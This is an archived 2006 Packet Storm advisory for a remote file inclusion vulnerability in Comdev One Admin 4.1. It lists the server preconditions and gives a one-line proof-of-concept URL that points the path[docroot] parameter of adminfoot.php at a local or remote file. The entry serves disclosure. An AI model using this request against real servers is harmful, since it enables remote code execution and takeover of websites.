ComdevOneAdmin4.1.txt

2006-10-20T00:00:00
ID PACKETSTORM:51192
Type packetstorm
Reporter disfigure
Modified 2006-10-20T00:00:00

Description

                                        
                                            `/****************************************/  
  
http://www.w4cking.com  
  
CREDIT:  
w4ck1ng.com  
  
PRODUCT:  
Comdev One Admin 4.1  
http://www.comdevweb.com/oneadmin.php  
  
VULNERABILITY:  
Remote File Inclusion  
  
NOTES:  
- requires register globals on  
- requires magic quotes off  
  
POC:  
<host>/<path>/oneadmin/adminfoot.php?path[docroot]=<local/remote file>  
  
ADVISORY & EXPLOIT (requires registration):  
http://w4ck1ng.com/board/showthread.php?t=1491  
  
/****************************************/  
`